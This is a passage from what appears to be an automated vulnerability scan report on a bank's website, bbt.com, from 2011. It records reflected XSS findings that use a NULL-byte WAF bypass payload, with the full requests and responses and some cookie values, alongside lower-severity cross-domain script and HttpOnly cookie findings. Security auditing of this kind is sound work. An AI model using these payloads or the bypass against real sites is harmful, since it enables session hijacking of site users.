The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/about/?%00f554d"><script>alert(1)</script>d8ef849160f=1 HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 20 Jun 2011 19:35:41 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 27984
cache-control: private
x-powered-by: ASP.NET
Content-Length: 28368


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<
...[SNIP]...
<a href="/bbt/about/default.html?page=print&%00f554d"><script>alert(1)</script>d8ef849160f=1" onClick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

2.2. http://bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0094f2b"><script>alert(1)</script>dc030128e2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94f2b"><script>alert(1)</script>dc030128e2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/careers/?%0094f2b"><script>alert(1)</script>dc030128e2f=1 HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 20 Jun 2011 19:35:47 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 33938
cache-control: private
x-powered-by: ASP.NET
Content-Length: 34110


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

       
   <title>Car
...[SNIP]...
<a href="/bbt/careers/default.html?page=print&%0094f2b"><script>alert(1)</script>dc030128e2f=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

2.3. http://bbt.com/bbt/contactus/personal.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/contactus/personal.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0069205"><script>alert(1)</script>8e0f5a55a14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69205"><script>alert(1)</script>8e0f5a55a14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/contactus/personal.html?%0069205"><script>alert(1)</script>8e0f5a55a14=1 HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 20 Jun 2011 19:35:48 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 46026
cache-control: private
x-powered-by: ASP.NET
Content-Length: 46302


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
                   
...[SNIP]...
<a href="/bbt/contactus/personal.html?page=print&%0069205"><script>alert(1)</script>8e0f5a55a14=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

2.4. http://bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0080f51"><script>alert(1)</script>d4dc5c11bbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80f51"><script>alert(1)</script>d4dc5c11bbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bbt/sitemap.html?%0080f51"><script>alert(1)</script>d4dc5c11bbe=1 HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 20 Jun 2011 19:35:51 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 32273
cache-control: private
x-powered-by: ASP.NET
Content-Length: 32945


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
...[SNIP]...
<a href="/bbt/sitemap.html?page=print&%0080f51"><script>alert(1)</script>d4dc5c11bbe=1" onclick="NewWindow(this.href,'product','650','500','yes');return false;">
...[SNIP]...

3. Cross-domain script include  previous  next
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


3.1. http://bbt.com/bbt/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/about/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bbt/about/ HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 20 Jun 2011 19:35:29 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 27936
cache-control: private
x-powered-by: ASP.NET
Content-Length: 28320


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<
...[SNIP]...
<!-- begin: Cy Site Seal Code -->
<script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal2p.js">
</script>
...[SNIP]...

3.2. http://bbt.com/bbt/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/careers/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bbt/careers/ HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 20 Jun 2011 19:35:34 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 33890
cache-control: private
x-powered-by: ASP.NET
Content-Length: 34062


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

       
   <title>Car
...[SNIP]...
<!-- begin: Cy Site Seal Code -->
<script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal2p.js">
</script>
...[SNIP]...

3.3. http://bbt.com/bbt/contactus/personal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/contactus/personal.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bbt/contactus/personal.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_cc=true; s_nr=1308598493694; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 20 Jun 2011 19:35:31 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 46022
cache-control: private
x-powered-by: ASP.NET
Content-Length: 46298


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
                   
...[SNIP]...
<!-- begin: Cy Site Seal Code -->
<script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal2p.js">
</script>
...[SNIP]...

3.4. http://bbt.com/bbt/sitemap.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/sitemap.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bbt/sitemap.html HTTP/1.1
Host: bbt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbt=52f3b26952f3b2fbbaeebafb; AMWEBJCT!%2Fbbt!ASPSESSIONIDQSQSBACC=GKDLACFAGCIIPJEOLLHHNLBA; PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; op499brightbankingpromopagegum=a03s09r0h9276km0yk2fm5f45; op499brightbankingpromopageliid=a03s09r0h9276km0yk2fm5f45; opdata=state%3DOther; s_vi=[CS]v1|26FFD06E85013DB0-6000010D800A3532[CE]; s_cc=true; s_nr=1308598534372; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
content-type: text/html
date: Mon, 20 Jun 2011 19:35:38 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-old-content-length: 32225
cache-control: private
x-powered-by: ASP.NET
Content-Length: 32897


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
   
   
...[SNIP]...
<!-- begin: Cy Site Seal Code -->
<script type="text/javascript" src="http://cyseal.cyveillance.com/SiteSeal/siteseal2p.js">
</script>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 16 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://bbt.com/bbt/css/topNav.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/css/topNav.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/css/topNav.css HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fabaeebafa; path=/
accept-ranges: bytes
content-type: text/css
date: Mon, 20 Jun 2011 19:38:33 GMT
etag: "067adad76acc81:17ab"
last-modified: Fri, 02 May 2008 17:05:10 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; Path=/
Content-Length: 3580

/* ---- Elements ------------------------------------------------------------------------*/


form {
   margin: 0;
   padding: 0;
}


/* ---- IDs -----------------------------------------------
...[SNIP]...

4.2. http://bbt.com/bbt/images/globalnav/bbt-logo-top.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/images/globalnav/bbt-logo-top.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/images/globalnav/bbt-logo-top.gif HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fcbaeebafc; path=/
accept-ranges: bytes
content-length: 3821
content-type: image/gif
date: Mon, 20 Jun 2011 19:38:33 GMT
etag: "0ff73f67b96c81:17ab"
last-modified: Fri, 04 Apr 2008 17:47:34 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; Path=/

GIF89aD.D..........q.&.ju......t.'[.!..+.......Rq...[.-h.$.1T....,E..=..3........<.J]...j'9........1..1.....N...e.$`.".`u.,Q.....2..0.#L...b.*..2.-M.Cd..6.gxt7H..........s..Uf....Jf....s...+.Xv.|..i..
...[SNIP]...

4.3. http://bbt.com/bbt/images/icons/ELH.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/images/icons/ELH.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/images/icons/ELH.gif HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fabaeebafa; path=/
accept-ranges: bytes
content-length: 212
content-type: image/gif
date: Mon, 20 Jun 2011 19:38:34 GMT
etag: "80d9be670f6c81:17ab"
last-modified: Mon, 04 Aug 2008 20:23:59 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; Path=/

GIF89a..........fff..."""......999...            |||333???......)))...HHH.............................................!.......,..........Q.$...8.......J2.k(. .D.&.... .....A..\..h...V...1u.^./.0.J.f.XV....u[..
...[SNIP]...

4.4. http://bbt.com/bbt/images/icons/print3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/images/icons/print3.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/images/icons/print3.gif HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fdbaeebafd; path=/
accept-ranges: bytes
content-length: 148
content-type: image/gif
date: Mon, 20 Jun 2011 19:38:34 GMT
etag: "08f7382d453c41:1db1"
last-modified: Wed, 16 Jun 2004 19:02:46 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_347ae440-9ca4-11da-83e0-00f81800e002=%2Fbbt; Path=/

GIF89a................iiidddlll..............................!.......,..........A0.I..8...<`.b.U...
.y....h.E1......nG......g0.....H........r..I..;

4.5. http://bbt.com/bbt/images/shim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/images/shim.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/images/shim.gif HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fcbaeebafc; path=/
accept-ranges: bytes
content-length: 43
content-type: image/gif
date: Mon, 20 Jun 2011 19:38:33 GMT
etag: "01e2254b1e5c31:17bf"
last-modified: Wed, 28 Jan 2004 15:13:48 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_b57fafc4-99a4-11da-83e0-00f81800e002=%2Fbbt; Path=/

GIF89a.............!.......,...........D..;

4.6. http://bbt.com/bbt/images/topnav/bbt_business.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/images/topnav/bbt_business.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/images/topnav/bbt_business.gif HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fcbaeebafc; path=/
accept-ranges: bytes
content-length: 1392
content-type: image/gif
date: Mon, 20 Jun 2011 19:38:34 GMT
etag: "0937f17cbf2ca1:1db1"
last-modified: Thu, 13 May 2010 18:35:42 GMT
p3p: CP="NON UNI CUR OTPi OUR NOR"
x-powered-by: ASP.NET
Set-Cookie: PD_STATEFUL_347ae440-9ca4-11da-83e0-00f81800e002=%2Fbbt; Path=/

GIF89av.(.................................................fff.................................ggg..............................egf......................................................................
...[SNIP]...

4.7. http://bbt.com/bbt/images/topnav/bbt_customer_service.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bbt.com
Path:   /bbt/images/topnav/bbt_customer_service.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bbt/images/topnav/bbt_customer_service.gif HTTP/1.1
Host: bbt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bbt.com/bbt/sitemap.html?%0080f51%22%3E%3Cscript%3Ealert(1document.cookie)%3C/script%3Ed4dc5c11bbe=1

Response

HTTP/1.1 200 OK
Set-Cookie: bbt=52f3b26952f3b2fdbaeebafd; path=/
accept-ranges: bytes
content-length: 1793
content-type: image/gif
date: Mon, 20 Jun 2011 19:38:33 GMT
etag: "806dd114ccf2ca1:17bf"
